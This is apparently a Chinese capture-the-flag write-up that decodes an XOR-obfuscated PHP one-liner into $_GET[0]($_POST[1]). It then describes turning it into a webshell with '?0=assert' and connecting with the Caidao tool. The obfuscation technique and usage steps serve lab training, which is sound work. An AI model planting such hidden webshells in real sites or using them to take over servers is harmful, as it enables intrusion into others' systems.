PHP代码分析溯源(第1题)

靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe

PHP代码分析溯源(第1题)_第1张图片

靶场显示一段PHP源码,经分析:

1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。

2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。

3、

$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");

("`"^"?")       01100000^00111111=01011111 —>”_”

(":"^"}")        00111010^01111101=01000111—>”G”

("%"^"`")      00100101^01100000=01000101—>”E”

("{"^"/")        01111011^ 00101111=01010100—>”T”

得到$__=_GET

4、

$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");

("$"^"{")        00100100^01111011=01011111—>”_”

("~"^".")        01111110^00101110=01010000—>”P”

("/"^"`")        00101111^01100000=01001111—>”O”

("-"^"~")        00101101^01111110=01010011—>”S”

("("^"|")        00101000^01111100=01010100—>”T”

得到$___=_POST

5、${$__}[!$_](${$___}[$_]);

得到$_GET[0]($_POST[1]);

6、构造一句话木马,将“0”当成参数,赋值为“assert”

7、使用菜刀工具连接,地址http://ip/b.php?0=assert  密码为1

你可能感兴趣的:(PHP代码分析溯源(第1题))